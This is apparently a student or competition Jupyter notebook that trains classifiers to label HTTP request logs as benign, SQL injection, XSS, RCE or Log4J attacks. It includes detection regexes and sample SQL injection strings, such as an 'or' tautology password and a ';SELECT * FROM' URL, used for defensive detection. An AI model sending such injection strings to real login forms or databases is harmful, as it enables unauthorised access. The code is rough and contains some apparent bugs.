#try erea
special_rep = {'{}': 'EMPTYDIR'}
special_str = ['[', ']', '--', ';', "'", '{', '}', '=', ',']
patterns_rep = {r'\%\d\d': r' \g<0> '}

def replace_str_for_types(s):
    for k in special_rep:
        s = s.replace(k, special_rep[k])
    for i in special_str:
        s = s.replace(i, f' {i} ')
    for patt in patterns_rep:
        s = re.sub(patt, patterns_rep[patt], s)
    return s

def space_words_data(s):
    return re.sub(r"(\-\-)|(\%\d\d)|([^A-Za-z0-9-_])", r' \g<0> ', s)

# r"(\-\-)|(\%\d\d)|'[A-Za-z0-9]+'|([^A-Za-z0-9-_])"

def is_sql_type(s: str):
    patterns = [r"';SELECT%20\*%20FROM%20.*(--)?", # select * from...
                r"'.*--",
                r"'%20or%20'(.*)'.*=.*'\1.*"]      # is match to the format of 'or 1=1'
    for patt in patterns:
        if re.search(patt, s):
            return True
    return False


#r_s = "orders/get/country?country=';SELECT%20*%20FROM%20order_details%20--hjgkgh"
r_s = "login/user?username=Shenita&password=JeriBarney'%20or%20'JoyceHopper'='JoyceHopper"
print(space_words_data(r_s))

# keep_list = ['Benign', 'Cookie Injection', 'Directory Traversal', 'Log Forging']
# keep_list = ['Benign', 'LOG4J']#, 'SQL Injection']
# df = df[df['attack_type'].isin(keep_list)]
#print(*f[['request.url']].values.tolist(), sep='\n')
info= {"Num":[12,14,13,12,14,13,15], "NAME":['John','Camili','Rheana','Joseph','Amanti','Alexa','Siri']}
 
data = pd.DataFrame(info)
print(data)
data.iloc[0]='new value'
data

login / user ? username = Shenita & password = JeriBarney '  %20 or %20  ' JoyceHopper '  =  ' JoyceHopper
   Num    NAME
0   12    John
1   14  Camili
2   13  Rheana
3   12  Joseph
4   14  Amanti
5   13   Alexa
6   15    Siri


Unnamed: 0,Num,NAME
0,new value,new value
1,14,Camili
2,13,Rheana
3,12,Joseph
4,14,Amanti
5,13,Alexa
6,15,Siri


In [None]:
# Setting features for further feature extraction by choosing columns
# Some will be "simply" encoded via label encoding and others with HashingVectorizer

LOG4_COL_NAME = 'isLog4J'

# On these headers we will run a "simple" BOW
SIMPLE_HEADERS = ['request.headers.Accept-Encoding',
                'request.headers.Connection',
                'request.headers.Host',
                'request.headers.Accept',
                'request.method',
                'request.headers.Accept-Language',
                'request.headers.Sec-Fetch-Site',
                'request.headers.Sec-Fetch-Mode',
                'request.headers.Sec-Fetch-Dest',
                'request.headers.Sec-Fetch-User',
                'response.status',
                'request.headers.Cache-Control', 'request.headers.Sec-Ch-Ua-Mobile',
                'request.headers.Sec-Ch-Ua-Platform', 'request.headers.Upgrade-Insecure-Requests',
                'response.headers.Content-Length'
                ]

# On these headers we will run HashingVectorizer
COMPLEX_HEADERS = ['request.headers.User-Agent',
                   'request.headers.Set-Cookie',
                   'request.headers.Date',
                   'request.url',
                   'response.headers.Content-Type',
                   'response.body',
                   'response.headers.Location',
                   'request.headers.Content-Length',
                   'request.headers.Cookie',
                   'response.headers.Set-Cookie']

COLUMNS_TO_REMOVE = ['request.body',
                    'request.headers.Date']


# This is our main preprocessing function that will iterate over all of the chosen 
# columns and run some feature extraction models
def vectorize_df(df):
    #remove the url
#     df['request.url'] = df['request.url'].apply(lambda x: x.replace('http://127.0.0.1:5000/', ''))
    
    column_names = df.columns.to_list()
    #df[LOG4_COL_NAME] = 'reg'
    for index, row in df.iterrows():
        for col in column_names:
            data = df.loc[index, col]
            if type(data) is not str:
                continue
            if col == 'request.url' and is_sql_type(data):
                df.loc[index] = '444444'
                df.loc[index, 'attack_type'] = 'SQL Injection'
                df.loc[index, 'label'] = 'Malware'
                break
            if re.search(r'\$\{[a-z]+:.*\}$', data):
                df.loc[index] = '51'
                df.loc[index, 'attack_type'] = 'LOG4J'
                df.loc[index, 'label'] = 'Malware'
                #df.loc[index, LOG4_COL_NAME] = LOG_4_ATTACK # isLog4J
                break
    
#     for column in column_names:
#         df[column] = df[column].apply(lambda x: replace_str_for_types(str(x)))
# #         print(df[column])
        
    le = LabelEncoder()
    h_vec = HashingVectorizer(n_features=2**5, ngram_range=(1, 10), alternate_sign=False, token_pattern=r'[^\s/]+') #, ngram_range=(1, 4)
    
    # Run LabelEncoder on the chosen features
    for column in SIMPLE_HEADERS: 
        df[column] = le.fit_transform(df[column])
    
    # Run HashingVectorizer on the chosen features
    for column in COMPLEX_HEADERS: 
        df[column].apply(space_words_data)
        newHVec = h_vec.fit_transform(df[column])
        df[column] = newHVec.todense()

    # Remove some columns that may be needed.. (Or not, you decide)
    for column in COLUMNS_TO_REMOVE: 
        df.drop(column, axis=1, inplace=True)
    return df

df = vectorize_df(df)
df

In [None]:
# Memory check (For large datasets sometimes the dataframe will exceed the computers resources)
df.info(memory_usage="deep")

In [None]:
# Choose the right features
# In our example code we choose all the columns as our feature this can be the right or wrong way to approach the model, you choose.

features_list = df.columns.to_list()
features_list.remove('label')
features_list.remove('attack_type')

features_list_more = features_list.copy()
features_list.remove('response.headers.Content-Length')


# features_list.remove('response.headers.Content-Length')

print(features_list)

# Recheck all datatype before training to see we don't have any objects in our features
# In this example our model must get features containing only numbers so we recheck to see if we missed anything during preprocessing
df.dtypes

In [None]:
# Increase the size of the heatmap.
plt.figure(figsize=(16, 6))
# Store heatmap object in a variable to easily access it when you want to include more features (such as title).
# Set the range of values to be displayed on the colormap from -1 to 1, and set the annotation to True to display the correlation values on the heatmap.
heatmap = sns.heatmap(df.corr(), vmin=-1, vmax=1, annot=True)
# Give a title to the heatmap. Pad defines the distance of the title from the top of the heatmap.
heatmap.set_title('Correlation Heatmap', fontdict={'fontsize':12});

## Train test split

In [None]:
# Data train and test split preparations. Here we will insert our feature list and label list.
# Afterwards the data will be trained and fitted on the amazing XGBoost model
# X_Train and y_Train will be used for training
# X_test and y_test.T will be used for over fitting checking and overall score testing

# We convert the feature list to a numpy array, this is required for the model fitting
X = df[features_list_more].to_numpy()

# This column is the desired prediction we will train our model on
y = np.stack(df[test_type])

NUM_ROWS = X.shape[0]
indices = np.arange(NUM_ROWS)
print(indices)
# We split the dataset to train and test according to the required ration
# Do not change the test_size -> you can change anything else
X_train, X_test, y_train, y_test, indices_train, indices_test = train_test_split(X, y, indices, test_size=0.1765, random_state=42, stratify=y)

# We print the resulted datasets and count the difference 
print(X_train.shape, y_train.shape)
print(X_test.shape, y_test.shape)
counter = Counter(y)
counter

## Model choosing and fitting

In [None]:
sub_features_list = ['request.url','response.headers.Content-Type',
                'response.body',
                'response.status_code',
                'response.status',
                'response.headers.method']

sud_feats_last = ['response.headers.Content-Length', 'request.url']
sub_label_list = ['Benign', 'SQL Injection', 'XSS', 'RCE']

def get_sub_train(X, y, clf, feat_og, feat_sub, label_sub, isNeg=False):
    if label_sub is None:
        label = []
    bool_feats = np.isin(feat_og, feat_sub)
    bool_labels = np.isin(y, label_sub)
    if isNeg:
        bool_labels = ~bool_labels
    X_new = X[bool_labels][:, bool_feats]
    y_new = y[bool_labels]
    
    return (X_new , y_new, clf.fit(X_new , y_new))


# X_train_2, y_train_2 = get_sub_train(X_train, y_train, features_list, features_list, sub_label_list, isNeg=True)

In [None]:
# from sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB
# # from sklearn.preprocessing import StandardScaler


# X_train_1, y_train_1 = get_sub_train(X_train, y_train, features_list, sub_features_list, sub_label_list)
# # X_train_2, y_train_2 = get_sub_train(X_train, y_train, features_list, features_list, ['RCE'], isNeg=True)

# # We choose our model of choice and set it's hyper parameters you can change anything
# clf = DecisionTreeClassifier()
# clf2 = DecisionTreeClassifier()

# # Train Model
# clf.fit(X_train, y_train)
# clf2.fit(X_train_1, y_train_1)

# # Check data balance and variety
# print("train:")
# print(*sorted(Counter(y_train).items()), sep='\n')

# print()

# print("test labels:")
# print(*sorted(Counter(y_test).items()), sep='\n')

In [None]:
######################## tryyyyy ######################

from sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB
from sklearn.linear_model import SGDClassifier
# from sklearn.preprocessing import StandardScaler

# We choose our model of choice and set it's hyper parameters you can change anything
clf = DecisionTreeClassifier()
# Train Model
# clf2.fit(X_train_1, y_train_1)
clf.fit(X_train, y_train)

X_train_1, y_train_1, clf1 = get_sub_train(X_train, y_train, 
                                           DecisionTreeClassifier(),
                                           features_list_more, sub_features_list, sub_label_list)
X_train_2, y_train_2, clf2 = get_sub_train(X_train, y_train,
                                           DecisionTreeClassifier(),
                                           features_list_more, features_list, ['Benign', 'XSS'])
X_train_3, y_train_3, clf3 = get_sub_train(X_train, y_train,
                                           DecisionTreeClassifier(),
                                           features_list_more, features_list, ['Benign', 'RCE'])
X_train_4, y_train_4, clf4 = get_sub_train(X_train, y_train,
                                           RandomForestClassifier(n_estimators=100),
                                           features_list_more, sub_feats_last, ['RCE', 'XSS'])

clf_feat_label_list = [(clf1, sub_features_list, sub_label_list),
                       (clf2, features_list, ['Benign', 'XSS']), 
                       (clf3, features_list, ['Benign', 'RCE']),
                       (clf4, sub_feats_last, ['XSS', 'RCE'])]


# clf2.fit(X_train_1, y_train_1)

# Check data balance and variety
print("train:")
print(*sorted(Counter(y_train).items()), sep='\n')

print()

print("test labels:")
print(*sorted(Counter(y_test).items()), sep='\n')

######################## tryyyyy ######################

## Result printout

In [None]:
def predict(data, clf, clf_feat_label_list):
    predictions = clf.predict(data)
    
    for clf2, feats, labels in clf_feat_label_list:
        bool_feats = np.isin(features_list_more, feats)
        data_new = data[:, bool_feats]
        for i in range(predictions.shape[0]):
            if predictions[i] in labels:
                predictions[i] = clf2.predict([data_new[i]])[0]
    
    return predictions


In [None]:
# We print our results
predictions = predict(X_test, clf, clf_feat_label_list) # clf.predict(X_test) #

def value_accu(predictions, y_test):
    sns.set(rc={'figure.figsize':(15,8)})

    true_labels = y_test

    cf_matrix = confusion_matrix(predictions, true_labels)
    clf_report = classification_report(true_labels, predictions, digits=5)
    heatmap = sns.heatmap(cf_matrix, annot=True, cmap='Blues', fmt='g', 
                          xticklabels=np.unique(true_labels), 
                          yticklabels=np.unique(true_labels)) 

    # The heatmap is cool but this is the most important result
    print(clf_report)
    
value_accu(predictions, y_test)

In [None]:
counter = 0

dict_me = {}
dict_data = {}

In [None]:
# # print(*h, sep='\n')
# h = zip(predictions, true_labels)
# for p,t in h:
#     s = f'{p}->{t}'
#     if s not in dict_me:
#         dict_me[s] = 0
#     dict_me[s] += 1

# print(dict_me, sep='\n')
# print()
# counter = 0

# h = zip(predictions, true_labels)
# for p,t in h:
    
#     s = f'{p}->{t}'
#     if s not in dict_data:
#         dict_data[s] = set()
#     dict_data[s].add(indices_test[counter])
#     counter += 1
    
    
# # print(dict_data, sep='\n')
# print('\n')

# #print('Benign->SQL Injection:', dict_data['Benign->SQL Injection'], sep='\n')

# # print('RCE->Benig', dict_data['SQL Injection->Benign'], sep='\n')
# print()

In [None]:
# print('fake Benign:')
# ind_list = list(dict_data['Malware->Benign'])
# R# print(df_checker.iloc[ind_list])
# # print()

# # print('fake Benign:')
# # ind_list = list(dict_data['SQL Injection->Benign'])
# df_checker.iloc[ind_list]['request.url'].values.tolist()

# Test

In [None]:
# Now it's your turn, use the model you have just created :)
raw_ds = {}

# Read the valuation json, preprocess it and run your model 
with open(f'./dataset_{str(dataset_number)}_val.json') as file:
    raw_ds = json.load(file)

test_df = pd.json_normalize(raw_ds, max_level=2)

fill_na_df(test_df)
    
test_df

# Preprocess the validation dataset, remember that here you don't have the labels
test_df = vectorize_df(test_df)

# Predict with your model
X = test_df[features_list_more].to_numpy()
predictions = predict(X, clf, clf_feat_label_list) # clf.predict(X)

predictions

# Save your predictions

In [None]:
# Save your preditions
enc = LabelEncoder()
np.savetxt(f'./dataset_{str(dataset_number)}_{test_type}_result.txt', enc.fit_transform(predictions), fmt='%2d')

In [None]:
import re
#'%20or%20'JoyceHopper'='JoyceHopper
# The pattern to search for
pattern = r"'%20or%20'(.*)'='\1"

# The string to search in
string = "'%20or%20'JoyceHopper'='JoyceHopper"

# Find the pattern
match = re.search(pattern, string)

if match:
    print('Found a duplicate word:', match.group(1))
else:
    print('No duplicate words found')
    
pattern2 = r"';SELECT%20\*%20FROM%20.*(--)?"
if re.search(pattern2, string):
    print("GOOD")
else:
    print("bad....")
# ';SELECT%20*%20FROM%20us_states%20--

In [None]:
# sub_features_list = ['request.url',
#                 'response.body',
#                 'response.status_code',
#                 'response.status']
# sub_label_list = ['Benign', 'SQL Injection', 'RCE']

# def get_sub_train(X, y, feat_og, feat_sub, label_sub, isNeg=False):
#     if label_sub is None:
#         label = []
#     bool_feats = np.isin(feat_og, feat_sub)
#     bool_labels = np.isin(y, label_sub)
#     if isNeg:
#         bool_labels = ~bool_labels
#     return (X[bool_labels][:, bool_feats] , y[bool_labels])
    

# get_sub_train(X_train, Y_train)

# # y_train[bool_list_labels]
# print(X_train.shape)
# print(bool_feat_list.shape)
# print(bool_list_labels.shape, '\n')

# print(X_train, '\n')
# print(bool_feat_list, '\n')
# print(bool_list_labels, '\n')

# X_train[bool_list_labels][:, bool_feat_list]
#X_train_sub, y_train_sub = get_sub_train(X, y, features_list, sub_features_list, sub_label_list)

In [None]:
# features_list

In [None]:
import numpy as np
y = np.array([0, 3,4,7,99])
y[1]